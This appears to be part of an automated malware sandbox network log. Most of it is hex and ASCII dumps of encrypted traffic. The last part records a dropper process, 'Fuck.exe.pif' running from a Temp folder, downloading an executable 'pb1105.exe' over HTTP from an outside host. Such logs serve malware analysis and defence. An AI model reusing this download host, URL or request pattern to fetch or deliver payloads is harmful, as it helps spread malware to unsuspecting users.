                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12151INData Raw: c4 3a 3c fa 59 3c 9c a3 14 2e 6b ae ff 80 22 78 7e ae 75 c0 e0 88 0e 14 34 06 87 d2 ee b3 d4 d5 c0 96 05 3f 94 23 8b b0 fe 95 fe ee 1a 5d 06 14 fe b2 8f 03 55 57 94 4f 60 37 3c f1 68 c9 57 c2 27 8b 27 25 df f3 8c 44 30 05 25 5c 11 52 ba 31 c9 e3 40 a4 c0 cb 93 3c 56 1f ff d8 39 41 e2 9c 9c 11 27 60 ce f3 d6 1c c1 57 85 b5 a2 44 5a 42 92 41 c8 81 6c 01 ac 8d af ab bd 69 61 5a 5a 9d 5d 9e 12 c0 18 0a b5 5c 30 8c bf 95 44 65 c0 bd 47 47 a9 b7 12 66 39 7a f9 87 0c cd 67 03 69 38 59 1c ab e6 59 c9 4f 8a 23 08 8f e8 b8 2a cc a0 74 98 af 50 ca 85 c2 1e b6 2c ab 7d 6c 25 07 05 e1 1f 26 30 38 ef e1 63 56 d8 fc bc 4c 36 1b 4b 06 b8 70 b2 96 c3 8a 0f c1 4e dd 5a 58 4f 7b 46 f7 6d ce 92 e5 5d 1a 97 07 c5 48 b5 42 11 86 d6 0f dc e3 97 77 93 f8 66 8b 89 89 0d 47 ae 65
                                                                                                                                                                                                                                    Data Ascii: :<Y<.k"x~u4?#]UWO`7<hW''%D0%\R1@<V9A'`WDZBAliaZZ]\0DeGGf9zgi8YYO#*tP,}l%&08cVL6KpNZXO{Fm]HBwfGe
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12167INData Raw: 03 5a fa 7f 9b 19 6a 75 95 8b 7d d7 cc 6f f2 de 89 ea fb 17 84 72 69 62 92 8c 47 b1 6a 30 c6 f0 d5 68 d7 bb 5a a3 83 f0 04 cf e9 f9 31 6d c2 b7 38 42 06 a9 7a 71 b2 02 66 77 d5 3f 39 08 4e f7 2b d4 fe c7 5e b4 81 28 d0 4b 40 51 f0 b1 a4 ad 8f ca e7 16 d6 97 f2 42 6f 85 99 7a 65 82 4d 7f 69 4b 55 92 10 2d 82 83 7a f1 f9 81 07 64 17 7b ee d7 5a 9b 13 ce 51 e4 32 6d 77 cc 69 ca 77 eb ad 4c 0f cd 09 80 cb 9f 3a c8 59 47 9b 3b 87 91 32 05 d2 cc ed 56 21 7a 0a 2b 7c 49 98 44 9e ea 8e bf a5 9e 34 d1 ff a7 1f a7 88 a1 98 ae 6c ae a2 41 77 8c d5 9b a0 c4 2a 54 47 d0 90 24 9d fd 14 1b 71 dc 5c 0f a4 fc f4 88 57 8b 62 34 7e c4 fa a0 1a 4b e1 10 6a c0 16 0c 9d 7f 45 aa bf 76 04 38 ae 85 e4 cd 0e 6c 16 36 62 d1 4c 0f 04 bb d3 ed 6d dd 5e 7f 0d b3 98 4e a9 3f 80 b4 bf
                                                                                                                                                                                                                                    Data Ascii: Zju}oribGj0hZ1m8Bzqfw?9N+^(K@QBozeMiKU-zd{ZQ2mwiwL:YG;2V!z+|ID4lAw*TG$q\Wb4~KjEv8l6bLm^N?
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12183INData Raw: a1 96 92 71 8e 74 e6 a1 3c e3 7c 2b 05 d4 24 4c 0c 8e c2 87 6d 65 98 4c 65 b5 19 d7 eb 50 c9 42 2c ff e2 77 87 2c dc f0 c7 fd d2 1b 6e dc 71 44 2e 92 71 2c cc e4 5f 4b 23 76 c1 6e dd 3e 66 89 e4 5e 84 58 52 77 5b ed 8f 53 f4 1b 27 7c 6f 01 0a 2d 98 c3 bd 59 24 33 5e 4a 52 99 9c fc c9 99 ce ac 86 57 cd 09 74 ad cd 3f 29 8c 3d 65 7a 0d b6 c6 df 0a fc fb 61 82 b3 2b be b6 81 13 53 5e 27 59 d6 c8 31 4b 5f f4 00 9d c2 e4 67 d6 d0 64 bf fb a6 f1 71 06 71 19 d1 3e 1d 1f 77 ae 2c 51 cd e7 85 a7 ac ba 01 45 2e 2b 2a 13 4d 4a 83 d5 30 3c 43 71 9b 2c 63 8a 54 92 8e 50 9b 08 d7 73 47 c0 d3 21 81 55 c0 60 0b 59 5c a7 46 d8 a9 b7 17 d2 88 cc 25 82 22 41 10 4e 7e 15 91 24 be c7 4f 50 42 b0 4a 64 da 7d 09 ea dc 16 86 c5 de 8e 51 b1 4e d5 f6 40 26 90 92 2a 1b 2f aa 9a 09
                                                                                                                                                                                                                                    Data Ascii: qt<|+$LmeLePB,w,nqD.q,_K#vn>f^XRw[S'|o-Y$3^JRWt?)=eza+S^'Y1K_gdqq>w,QE.+*MJ0<Cq,cTPsG!U`Y\F%"AN~$OPBJd}QN@&*/
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12199INData Raw: 6a fa 40 5c 0f 26 74 ac a1 f2 a8 ed f5 4c a3 38 40 61 15 3f b8 49 5e b9 a6 98 f8 80 90 fa a4 a8 c3 ad 7f 3b ac 03 5f 83 0b 33 87 69 af 5b 55 1d 4c 8f 26 58 98 f6 ef 68 84 fb c0 aa 55 ee 76 79 ec 4b b4 5f c4 7d 6b 26 55 31 c6 a6 c9 e8 57 70 c0 bb e9 74 a6 69 6b 9b d5 90 1d 30 1c 6e 9c 4c dd 56 d9 a7 df bf 19 53 b0 74 20 3a 42 cb d2 21 27 fc 89 b3 fd 2d c1 09 f1 8b e5 1e a3 14 14 84 c8 df 0a 49 07 bf f5 8f 76 f7 cc 20 5a db f1 a0 31 87 5f 05 76 8f dc a7 22 6c 24 14 43 36 c8 e8 a2 42 2e e4 5e 49 5e 4d fb 0b 62 fe 3e 9b 48 00 7c c6 55 9a 04 9b 41 d6 d2 a4 a5 ab 86 9f 94 91 60 9d 74 e2 92 0b 0c 09 6c 3b fa e9 e8 f1 ac c6 04 df 4a 8c 12 ea 11 26 fc cf 1b 7a 89 f9 43 9b f9 5f e9 49 9e 67 b6 2a b5 74 d2 76 63 0f f1 64 c8 aa 6c 76 8b b1 6b cf 3c 03 21 f6 f4 06 e1
                                                                                                                                                                                                                                    Data Ascii: j@\&tL8@a?I^;_3i[UL&XhUvyK_}k&U1Wptik0nLVSt :B!'-Iv Z1_v"l$C6B.^I^Mb>H|UA`tl;J&zC_Ig*tvcdlvk<!
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12215INData Raw: 21 6d 69 26 eb b1 4f 69 e3 08 44 29 1d b4 e6 88 93 2d e2 17 e2 78 a5 95 13 d8 75 66 68 81 18 cb c8 ae 7b 67 a6 16 fc e0 80 81 64 0c dc 3e 5b 05 98 eb e7 12 0e 3e 54 20 54 65 ca a2 04 36 a0 f5 00 40 da 1e 45 eb aa f4 eb f8 06 cf 25 c2 9a 8a 37 5d 27 16 3c ed 0d d7 d0 3a 83 d9 e0 93 18 53 41 94 06 68 37 db 77 49 ca 98 d8 0e 16 d7 84 e7 1f 6a 9b 5a 21 ee 6e ed 89 30 99 e1 06 5b c3 d0 ed e0 50 1c b1 e2 9a d8 8d a2 27 ef df 24 69 73 72 cb b6 2a 9f 01 61 1d 9f 60 f3 d2 50 02 2a 42 24 dd 5b 24 e2 42 f1 da ce f8 20 d5 fe b0 6b fe 36 2c ab 4a c2 5d 8b ee 30 4d eb 04 96 0e 7b 51 d9 5e 95 3b d0 2f 3b 97 f4 5c 2b 91 43 7d 01 16 b8 43 68 0a 3f bd af 0c 9d 57 98 38 2d c5 73 09 d2 f4 27 a3 34 e2 dd 3a c1 ac 1e 70 01 1f 8b a2 fc 75 ab b9 b9 f4 b5 a8 38 ff b4 30 ea 0c e2
                                                                                                                                                                                                                                    Data Ascii: !mi&OiD)-xufh{gd>[>T Te6@E%7]'<:SAh7wIjZ!n0[P'$isr*a`P*B$[$B k6,J]0M{Q^;/;\+C}Ch?W8-s'4:pu80
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12231INData Raw: 22 43 76 f6 c9 0b ec fb 6e 04 a1 f0 80 c7 f5 ff eb 29 4a 3d 08 9e 76 52 fa b4 a9 15 4b 9a f6 78 fb ef 8d 0c 77 75 72 cc b5 59 21 5e 21 00 49 7d d3 5a c3 1f ca 16 35 3b 21 f6 dd 9e c3 cb 5b 9c 48 93 99 56 db 5c ed a0 18 0a 99 0a f3 52 b1 d1 3b 63 64 b8 31 f8 5d 13 31 db 75 a5 29 b2 5f ca 6f 03 24 a2 61 0e 46 d5 e1 b8 11 32 ed cf 9d cb 1f f7 ca ab aa ac 92 04 5b 67 48 b5 73 41 49 7a 01 bf 62 a7 49 5b ae 05 a7 43 15 09 39 bc 26 50 4f 14 72 be 4e b6 22 bf 07 79 95 a8 97 3b bf 31 30 e1 db 10 ce e5 d6 44 0f 73 29 5a e6 6d 82 70 0f cc 06 87 bf 26 52 3c 12 f5 b6 11 f7 85 73 48 98 6e da b1 88 32 35 bd 72 fa 5e 25 2b 14 74 a4 de b2 39 19 44 05 6c 76 dc 60 02 a3 d4 f3 11 b7 9c 39 c0 fe ce 9b c9 48 5f 24 94 a3 4f 6f 01 dc c2 90 14 7a 92 f4 1c 17 02 67 dc 64 c6 7c 25
                                                                                                                                                                                                                                    Data Ascii: "Cvn)J=vRKxwurY!^!I}Z5;![HV\R;cd1]1u)_o$aF2[gHsAIzbI[C9&POrN"y;10Ds)Zmp&R<sHn25r^%+t9Dlv`9H_$Oozgd|%
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12247INData Raw: 6a 13 89 b2 c5 fd 46 da 19 02 09 a6 bb 4f 31 3d 1c e0 14 39 5d ce bf d1 a9 31 31 fb 0c 51 24 db ac d9 c9 1a b2 87 27 48 4f 20 7c 25 2c a4 88 17 08 ed 22 59 53 25 25 70 80 6b fb 18 5c 51 38 06 83 7c 08 e1 58 98 86 29 e0 6b b2 1c 02 81 f9 d5 18 e9 fb 33 3b 86 17 fb 59 6e 92 b6 56 66 46 de 6b f5 5f e5 96 d2 bf 7e f6 4f 64 70 82 9d c4 c9 ef 07 ff 92 39 67 05 69 7d 96 7b de db 69 b8 20 ad f4 c1 5e 1d ac 47 b0 b5 82 82 6e 9b 62 cf 05 8c 3c c6 b8 cc da 97 8e b7 43 6a 3b e5 4b ba 20 e1 f4 c7 fe 0e e3 96 8a 76 50 d7 ca 2f 2a b9 8d 00 ab a1 1a fa 4c 97 8b ad bc ea d7 fd 69 17 a8 c9 95 24 f4 1d 16 af 34 08 8a 62 c6 36 07 5f dc 6a 58 51 a3 53 38 fa 8e 0d df 12 1a 65 a7 a6 26 4d 4c e3 02 e3 6e 84 09 df e8 f7 5c 7c 01 75 1c 8a dc 68 4d f6 44 6c 7c c3 b7 7e 53 8f 8f 2f
                                                                                                                                                                                                                                    Data Ascii: jFO1=9]11Q$'HO |%,"YS%%pk\Q8|X)k3;YnVfFk_~Odp9gi}{i ^Gnb<Cj;K vP/*Li$4b6_jXQS8e&MLn\|uhMDl|~S/
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12263INData Raw: f3 7c 13 2a f3 77 e4 b4 84 3d 18 b9 ac 9e 62 c2 30 ee 74 2e 70 77 2d 3e 6d 29 2b 82 89 65 d0 16 50 22 e8 37 bf ad 52 5c 81 8d 0c d9 51 c7 9d af af ca 4f ca 5b 81 12 63 90 3d 4d 49 62 9a 5f 0a ac 4f 5c b4 fa 6b ea e1 d4 f2 80 4f 4d 13 06 d8 39 b7 b8 5e 78 e9 26 46 50 d0 f5 59 9b d9 12 eb a4 e5 11 7f cb 77 2d 7f 43 c9 f1 92 0b 6c 16 ab ee a8 3f 9c 2d 03 f0 b6 da 90 34 18 e8 54 35 95 47 ab ec 2d 7f d6 67 55 c7 0d 1c e7 d0 9d 05 c3 eb 00 95 b9 19 c1 95 32 21 d0 60 2a 14 72 a8 93 49 39 d5 20 55 73 3c dd 27 e6 01 53 bb c5 ca 4a ce a5 2b 6d 6b 9d 2e 40 ea 70 5c 7a 17 75 a5 29 dd 19 43 ba b1 11 f9 8e 6e 0d 2a d0 ae 5a 20 c7 5a 7d 15 ca ed c7 91 b2 55 45 37 56 98 ba 24 a3 07 86 07 97 21 e7 37 63 7a 78 34 3e c1 98 8a ba d9 e2 48 bb cb d6 03 8c 11 d1 5f 0d ae 75 de
                                                                                                                                                                                                                                    Data Ascii: |*w=b0t.pw->m)+eP"7R\QO[c=MIb_O\kOM9^x&FPYw-Cl?-4T5G-gU2!`*rI9 Us<'SJ+mk.@p\zu)Cn*Z Z}UE7V$!7czx4>H_u
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12279INData Raw: 97 df 96 db 0e a4 27 3c 1e af f8 f0 68 d2 b4 3d 2b cd 1b 66 71 30 94 da 4f bc 9d 59 36 f2 56 35 69 e0 83 5d fb 2a 46 21 98 47 7e 25 45 f0 bc 5c 04 9b 43 ec 7a 21 b6 4f 10 4f 48 cc d1 67 3c a6 99 68 05 6a bf 0e 86 b9 da 6b a7 42 c9 12 3c c7 d0 17 e4 45 b5 4d 28 16 e6 70 08 a2 d7 a3 f2 fe 97 b8 6e 12 c1 99 b2 2d 29 ff 04 ea 95 f5 96 c5 27 ac 47 3e 10 47 01 39 7e 0c 3a 02 1b e8 be 1d b8 45 bc 6a a4 fb 53 2a 36 c9 bf 8d b3 07 8e 74 3f 32 04 12 38 ce ef 64 c2 a5 b5 bc 09 e4 c2 94 fa 1f 29 6d 57 5b ce 8c 66 95 35 db 8d d1 e2 ab 18 69 42 8f 9e 8e 02 20 56 75 68 a5 40 25 de 34 5d 34 82 6a c4 a9 14 f0 f5 e7 41 72 11 58 94 6e 4f cf 9f 5d 9c 01 b8 f9 f2 fe 28 3b c2 67 8e 1b 5f 16 3c 33 23 f7 0a a5 33 62 ae 47 df 39 7d 19 28 33 34 fb 3a 9b 78 c6 92 31 04 e9 3b 8c 7a
                                                                                                                                                                                                                                    Data Ascii: '<h=+fq0OY6V5i]*F!G~%E\Cz!OOHg<hjkB<EM(pn-)'G>G9~:EjS*6t?28d)mW[f5iB Vuh@%4]4jArXnO](;g_<3#3bG9}(34:x1;z
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12295INData Raw: 69 18 ef 7f 24 6f 8b fe aa a6 c4 52 8e 62 12 c2 3a 93 9e ef 17 75 e9 68 05 db 9e 86 cd 2c 25 12 2a b4 98 f4 5b ce 9a 95 11 5a 8d b2 ac f1 88 a3 bd 76 36 e2 42 af 18 da 7d 04 14 2e e6 03 8c b4 fb 76 7f e0 a6 8e ae e1 9e 17 40 62 fc 77 d1 dd 55 c8 5d 29 d7 8d 01 04 33 0e 58 85 f2 8c bd 39 89 f5 e2 58 9e 55 fb 74 57 db 0f bf 49 2b 6a aa f1 6d 19 46 22 4e 75 2c 79 d9 93 a2 c6 60 d5 26 15 10 e0 f9 e6 38 3c 04 a4 c8 e2 34 b9 9d 45 e8 e2 a3 24 9f 23 58 47 77 49 5e 1a 68 e6 ce 44 73 e5 bf 95 a3 06 56 82 c5 68 a4 f5 c2 59 2a d8 f5 71 b5 1e 4d 2b 71 c3 cc 99 2f c3 71 fd 45 48 cc d7 3a d5 08 f9 fa b4 a6 d2 72 9f ac 31 f3 e5 c0 16 62 45 81 3d b9 74 81 6a f2 8f 3a 97 81 8c ef 88 9e b8 e1 0d 64 1b c6 a3 5f 24 3b 27 f6 c3 17 5d 43 bd 97 54 82 b6 4b b8 7e b8 87 b5 e2 9f
                                                                                                                                                                                                                                    Data Ascii: i$oRb:uh,%*[Zv6B}.v@bwU])3X9XUtWI+jmF"Nu,y`&8<4E$#XGwI^hDsVhY*qM+q/qEH:r1bE=tj:d_$;']CTK~
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12311INData Raw: 7b 96 f9 4f 3d 2a 38 d8 85 47 4a ed 63 34 55 97 23 a1 2f 11 c8 97 b6 c8 a0 64 6e 11 f0 f4 eb b2 39 fa 4d 19 3d 2d a8 dd 90 5b 53 01 e9 fb 18 69 19 18 4e ca 1f fb 2e e6 7a 71 b3 a5 25 45 72 36 9b f8 d4 2c a8 b5 19 14 b0 96 02 ef 19 b0 cf b2 2e b8 17 20 ec 94 e9 e6 ad 22 fd b0 9a 03 6d 2b 99 49 6c f4 ad f6 c3 2a 44 83 7f c6 ae 17 bf c4 eb 11 88 c1 fc e4 21 36 63 48 a1 34 e8 08 ff 56 78 b5 22 97 f3 7b 80 5f 1f c8 15 f8 9b d2 be 5f c3 e0 2e 2f d6 01 cc 09 42 3c e1 03 f3 68 69 35 15 32 21 58 12 e8 76 cc 7d 64 78 5f 23 b7 6b c0 c3 51 e8 02 7e af 2e 7b fe d7 2c d4 87 e0 40 00 bb 6b d9 e3 b5 e5 16 75 a8 c3 86 99 0f 64 50 b6 61 b6 39 42 2a 8c 64 58 54 05 89 e6 5f 59 a3 75 cf 4f 0b 8a d9 27 f4 d5 5a 4f 6b 7a ca e2 2b 50 12 60 e5 25 c3 01 fc 61 70 3c 2c 96 d4 78 30
                                                                                                                                                                                                                                    Data Ascii: {O=*8GJc4U#/dn9M=-[SiN.zq%Er6,. "m+Il*D!6cH4Vx"{__./B<hi52!Xv}dx_#kQ~.{,@kudPa9B*dXT_YuO'ZOkz+P`%ap<,x0
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12327INData Raw: cf 31 f1 1a a4 42 56 6b 1c 9a d6 1e 63 3e c0 c6 62 1e ea 7b c2 f1 4c 30 b8 1f f8 8c 9d fb 45 d0 6b d1 ca 58 a5 92 fd 43 c5 02 64 1a b1 25 50 6c ad ac 44 16 3c f5 58 c3 73 75 87 0e 09 bb 95 44 f9 19 4c 64 a9 94 45 a3 2e 84 b4 f4 8d 3f ed 99 0b 15 c1 07 a8 78 16 90 49 cd dc 91 9d 6f 34 77 34 b1 57 e3 7b 06 5d d8 ff 34 12 34 7f 5d 8f fc 3d fb 14 ea 82 97 5c 47 27 bd c5 99 c3 24 34 b0 b8 c4 f2 eb d7 26 ba 6d 9a 2c a8 8b 45 6b 48 1a 3f 9b 7c 88 46 4f a3 2e ba 22 23 e3 c5 9b 66 e4 b6 aa 38 be 9c 69 81 86 53 04 42 f0 da 5b 76 34 f9 d6 34 fb e9 cd a9 7f 6e d2 ce 17 f4 f2 99 d6 24 f7 82 fd 5f 31 33 57 4f 5d aa 03 77 ad 83 54 fd 22 77 fc f5 09 a3 28 75 54 a3 bf 02 c6 ac d2 f4 f3 e5 d5 43 97 0a c2 60 f4 8a 1d 6a fd 59 1f 7e 81 33 a0 3d 1d f6 ec 20 cf 17 92 f8 60 c8
                                                                                                                                                                                                                                    Data Ascii: 1BVkc>b{L0EkXCd%PlD<XsuDLdE.?xIo4w4W{]44]=\G'$4&m,EkH?|FO."#f8iSB[v44n$_13WO]wT"w(uTC`jY~3= `
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12343INData Raw: a4 ac 57 84 b7 40 1b 46 3a 37 16 e4 fa 27 ed 49 b9 2a 14 5c ab 5f 45 7f d1 7b e1 0b 8d e7 2a c7 80 d3 d6 04 e5 87 ba 44 0e 2d 35 f4 7c 49 81 a6 a8 47 d5 b4 05 fe 0c 76 9b 3d 5b 33 4b c8 7e d1 99 ba 2f 92 8f 79 ff 34 91 a7 4a 04 e2 2a 58 b0 5f 26 05 79 7d 7c f1 b0 ed f9 fc 8b d5 85 e2 c9 39 a7 9c 73 10 bd 91 90 d4 a0 72 36 47 f6 1d f1 a5 37 70 29 ab ea 87 b4 60 c2 b9 a7 bf b7 11 b9 0f cb d3 38 a5 aa ca b0 31 75 1d c0 0f 6e ae a9 d6 1a 98 8d 07 33 6b cc b0 e3 af be d2 c5 90 cc ed 7c 51 e2 02 bd 55 5b 82 e4 d7 c3 ce 9e 15 49 87 34 46 b8 d8 90 30 0a f5 e0 fc 0c 93 cf 6e a2 63 fa 84 70 92 0c 8b 60 6c 3c 74 fd 66 2b 6f 1e ae 1f 3c b7 9c 49 48 20 34 db 71 54 37 ee fd 4e 69 a2 ae d2 01 77 c5 74 cb 36 d3 7b f4 95 30 20 4b 68 38 20 74 45 49 0c 90 ca 2e fe 35 46 f6
                                                                                                                                                                                                                                    Data Ascii: W@F:7'I*\_E{*D-5|IGv=[3K~/y4J*X_&y}|9sr6G7p)`81un3k|QU[I4F0ncp`l<tf+o<IH 4qT7Niwt6{0 Kh8 tEI.5F
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12359INData Raw: ca 4b f9 16 75 2f bd bc cc d5 e1 81 7c 1f fd 70 13 06 a7 53 ff e4 c8 2b 25 0e 7c 2d f5 a7 42 79 1e f4 f5 f1 38 f8 f3 39 3c ac a8 8c 9a 2d 27 17 57 c7 9a 31 18 66 7a 07 17 77 cc 6c f8 ce 18 5d 10 b3 d6 1e dd 3a aa 77 54 39 eb c4 2e ab 70 da a9 fb 09 44 46 67 7f 91 32 f0 cd 79 63 bd 64 60 9b e1 d7 eb 2b 9b c4 aa 98 4b 0d d3 97 12 0a 05 94 6a f0 5a 1a 12 c3 a2 55 84 15 a0 1d 4a 65 3f 8a 2a 8d 7f 3c bc 77 18 2e 03 a4 84 82 34 a5 48 7c 86 55 e4 71 e1 3f c4 df 1a a3 95 72 d5 ea 66 00 98 b1 02 dd 88 e0 a2 48 fb 56 2f f4 e8 08 09 2d be 0a dd cb 77 fe 03 22 63 59 f8 88 f8 19 32 ef 7e 46 20 22 f3 de 0e 29 c5 6f 11 36 e4 58 a5 b3 ef e5 17 b9 aa 21 53 79 85 00 86 d9 ca 13 2c c4 2e fc 10 d8 bf dc 59 4d 65 1c 81 e0 c9 9e 86 69 05 f3 91 c9 31 07 43 ff 08 ed e9 cb 8a af
                                                                                                                                                                                                                                    Data Ascii: Ku/|pS+%|-By89<-'W1fzwl]:wT9.pDFg2ycd`+KjZUJe?*<w.4H|Uq?rfHV/-w"cY2~F ")o6X!Sy,.YMei1C
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12375INData Raw: 58 41 25 d8 44 26 51 d2 e1 a8 5b 29 ac 6e 92 0e fa 65 55 a9 00 64 92 d8 aa 00 cc aa 99 fb 63 dd a0 22 d6 79 a6 68 1e 91 2a 7c 80 50 eb 9b 39 b2 0c 2b f4 e5 7e 36 30 21 f2 c6 73 59 4c cc 35 cd dd b7 8b fd e4 f1 b4 e3 00 8f 0d b1 24 82 73 bf 51 cb d1 47 45 1f 43 16 32 e7 bd 1c 3f b0 20 7d 9f af 58 7e 83 19 00 89 f9 35 b3 1e fe 65 7d ae e7 d4 a7 25 f0 40 de a7 a9 4d 51 e0 8e f3 af a1 dd 8a b3 f9 2b 6f 21 9f f2 bc d6 a8 f9 2a 7e b4 c9 c5 0d 30 78 d8 55 10 9d db 19 17 76 71 b6 95 2f 98 56 f5 9c b4 80 b0 d2 93 46 d1 37 36 a1 23 4e 80 b9 2b 2f 97 97 48 b8 66 bb d4 97 81 6f 2b 96 bc 0e dc 92 f5 2b 71 5e 61 97 3e c3 ad 84 09 9e cc c9 bb 59 a9 33 20 2b ea df 5a 76 28 16 de 15 da 04 20 be b7 5f 49 71 24 38 d3 b7 01 93 e9 e3 d3 e5 7c 43 b2 a7 36 68 b9 6d c8 7b 5b 14
                                                                                                                                                                                                                                    Data Ascii: XA%D&Q[)neUdc"yh*|P9+~60!sYL5$sQGEC2? }X~5e}%@MQ+o!*~0xUvq/VF76#N+/Hfo++q^a>Y3 +Zv( _Iq$8|C6hm{[
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12391INData Raw: 1a be a0 eb f2 5e 84 44 59 d1 9e 4c b9 74 ae 1b 84 18 2f b3 8c d2 cd 22 9b 94 31 8d f0 77 e2 b4 45 9f 20 ea ef 71 61 cb e5 76 69 9a 30 bc b3 3f 13 8d 25 cb 4f bf 3e db 41 3a 45 df e8 83 2f 72 53 99 aa b8 d6 79 8a ad 7c ab 8d f3 a6 ec b8 a5 57 af 30 3e 20 b8 90 cc e5 00 44 59 21 0e 69 a0 2e f8 36 a1 97 47 aa c1 d2 d9 5f 41 fe 2b f2 1e 48 aa c7 50 52 9d 2d c8 28 0e 5e 53 e0 a0 19 58 e3 7a dd f5 67 ab 8f 13 de 3f e4 f7 67 46 a9 b0 03 fa 9b b7 31 a5 16 53 b4 92 c9 bd 9d 07 39 11 22 24 8a 93 ea a2 6e a9 eb b3 6a db 58 7b b3 ab d7 77 9f 97 4a f7 b9 ee 99 51 1c e3 5f b0 e8 d3 d5 0b d9 45 12 3f 66 cf 05 44 2e 93 c6 55 00 b9 0c 11 54 0a a5 93 4a e7 9f 9a ae ff 76 55 ed d3 f4 e7 18 0d 96 90 f9 51 4f 87 42 e9 2a f5 88 01 36 d9 06 92 92 a6 bc 5a 0e 32 bd db a8 26 ef
                                                                                                                                                                                                                                    Data Ascii: ^DYLt/"1wE qavi0?%O>A:E/rSy|W0> DY!i.6G_A+HPR-(^SXzg?gF1S9"$njX{wJQ_E?fD.UTJvUQOB*6Z2&
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12407INData Raw: b4 68 a1 75 70 f6 ac 51 54 da 4b 1e f3 3d 9e e3 ec a0 31 c2 5d 13 8f 7a 43 0c 2d e4 ec 9a 8d c9 50 09 af 6f 30 56 f0 e3 26 7b 90 94 7a 4f a6 06 4e 0a 03 f9 c1 8e 01 94 34 e4 12 92 34 78 bf 3b 9d 36 21 b6 68 81 a8 7d a9 3c bc 7b 91 9f d1 d4 ee 20 8f 9c 4a 4d 62 f3 51 db a2 45 2c 8e e5 3c 4b bf af 5e fc 88 1e f1 4c 3c 8e 91 92 07 d1 71 91 ec a5 6a 81 07 91 d6 b9 37 23 e2 9c 02 88 d7 a3 f7 79 88 d9 c7 db c8 7c dd 3a e6 08 3e c7 03 4d f5 e0 82 31 c5 38 3d 47 c8 15 9b a5 bb 99 e7 77 9a 67 78 37 6a e0 ad 35 c6 e8 ae 38 cd 20 b7 25 c2 4d ff 7b 9c d5 2d 89 44 3b fc b8 10 6f ce 9f a3 e1 89 0b 43 7d 10 7e 21 76 73 74 9d 8e 00 f8 44 dd 71 20 30 fc 51 2b 86 4c a5 06 cc b0 b0 f2 4c e7 02 bd 49 1e c1 ed b9 67 59 c2 5b 75 84 f6 8e 56 fa e4 46 79 60 f0 ba 04 0e 12 e0 9b
                                                                                                                                                                                                                                    Data Ascii: hupQTK=1]zC-Po0V&{zON44x;6!h}<{ JMbQE,<K^L<qj7#y|:>M18=Gwgx7j58 %M{-D;oC}~!vstDq 0Q+LLIgY[uVFy`
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC12423INData Raw: 21 4c d4 bc ae 1b 03 75 5d 78 66 d9 3a 31 44 9a 33 40 bf 08 d7 5a 49 a4 c2 e6 a9 a0 67 dd a4 27 bc a1 4f 39 b5 11 58 17 f7 24 5c 46 8f 64 f7 c1 69 88 76 98 76 3d 59 5d 42 76 87 89 97 69 7a 48 f0 e0 a2 12 1b 66 9a 74 ca de 4b 1e e7 0e 63 ae e6 d4 ef 92 92 3a 9e 3d dc 00 e4 45 25 89 b6 9a 44 19 2b 7e c0 94 b4 d2 61 6d eb 33 d9 c5 df 4b 04 00 cc 7d 1c 95 c3 8f f7 21 b2 b2 11 b7 bb 7f f2 d5 8c 70 2c 41 60 aa b1 63 18 44 95 1a 76 62 7e f6 80 b0 fb e8 64 a6 33 d1 89 07 e1 bd b7 e6 43 a4 18 b8 a6 77 01 e1 0f 94 0c 21 1d b2 54 29 25 89 6c e5 0e 52 51 47 74 be 26 ac b6 41 75 de 7a ac 5f 8d 3f c9 bc d3 41 11 12 5b e5 10 50 eb 31 c5 ca 72 16 22 09 df 7c 4c 75 3f 63 ec 21 5f c4 20 51 6b 6f b1 ab 86 8b 4f c2 d6 45 5f 9d 20 fc a1 1e c5 c0 8f a2 b1 7e 0a 26 99 f5 e4 69
                                                                                                                                                                                                                                    Data Ascii: !Lu]xf:1D3@ZIg'O9X$\Fdivv=Y]BvizHftKc:=E%D+~am3K}!p,A`cDvb~d3Cw!T)%lRQGt&Auz_?A[P1r"|Lu?c!_ QkoOE_ ~&i


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    1192.168.11.2049837104.21.25.158443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12425OUTGET /files/pe/pb1105.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: mnh.ajn322bb.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12425INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:12 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Content-Length: 3632640
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Last-Modified: Sat, 01 Oct 2022 13:54:41 GMT
                                                                                                                                                                                                                                    ETag: "633846a1-376e00"
                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                                    Accept-Ranges: bytes
